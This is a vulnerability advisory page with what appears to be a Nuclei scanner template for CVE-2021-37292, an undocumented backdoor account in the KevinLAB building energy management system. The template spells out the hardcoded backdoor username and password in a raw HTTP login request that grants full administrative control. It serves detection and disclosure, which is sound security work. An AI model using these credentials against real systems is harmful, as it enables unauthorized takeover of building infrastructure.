KevinLAB BEMS has an undocumented backdoor account, and these sets of credentials are never exposed to the end-user and cannot be changed through any normal operation of the solution through the RMI. An attacker could exploit this vulnerability by logging in using the backdoor account with highest privileges for administration and gain full system control. The backdoor user cannot be seen in the users settings in the admin panel, and it also uses an undocumented privilege level (admin_pk=1) which allows full availability of the features that the BEMS is offering remotely.
PoC代码[已公开]
id: CVE-2021-37292
info:
name: KevinLAB BEMS (Building Energy Management System) - Backdoor Account
author: gy741
severity: high
description: |
KevinLAB BEMS has an undocumented backdoor account, and these sets of credentials are never exposed to the end-user and cannot be changed through any normal operation of the solution through the RMI. An attacker could exploit this vulnerability by logging in using the backdoor account with highest privileges for administration and gain full system control. The backdoor user cannot be seen in the users settings in the admin panel, and it also uses an undocumented privilege level (admin_pk=1) which allows full availability of the features that the BEMS is offering remotely.
reference:
- https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5654.php
- https://nvd.nist.gov/vuln/detail/cve-2021-37292
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
cvss-score: 7.2
cve-id: CVE-2021-37292
epss-score: 0.11149
epss-percentile: 0.93165
cwe-id: NVD-CWE-Other
cpe: cpe:2.3:a:kevinlab:4st_l-bems:1.0.0:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: kevinlab
product: 4st_l-bems
tags: cve,cve2021,kevinlab,bems,backdoor,vuln
http:
- raw:
- |
POST /http/index.php HTTP/1.1
Host: {{Hostname}}
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
requester=login&request=login¶ms=%5B%7B%22name%22%3A%22input_id%22%2C%22value%22%3A%22kevinlab%22%7D%2C%7B%22name%22%3A%22input_passwd%22%2C%22value%22%3A%22kevin003%22%7D%2C%7B%22name%22%3A%22device_key%22%2C%22value%22%3A%22a2fe6b53-e09d-46df-8c9a-e666430e163e%22%7D%2C%7B%22name%22%3A%22auto_login%22%2C%22value%22%3Afalse%7D%2C%7B%22name%22%3A%22login_key%22%2C%22value%22%3A%22%22%7D%5D
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- 'data":"[A-Za-z0-9-]+'
- 'login_key":"[A-Za-z0-9-]+'
condition: or
- type: word
part: body
words:
- '"result":true'
- type: status
status:
- 200
# digest: 490a0046304402206c4e497140ec84b689788e170e0f149899f719231fde5001f9c165af0c0cce9f02207f3d775a97d2e3aac4ad85a478fa8865a5b17607cb784d5ddd29e00fa3eff3e0:922c64590222798bb761d5b6d8e72950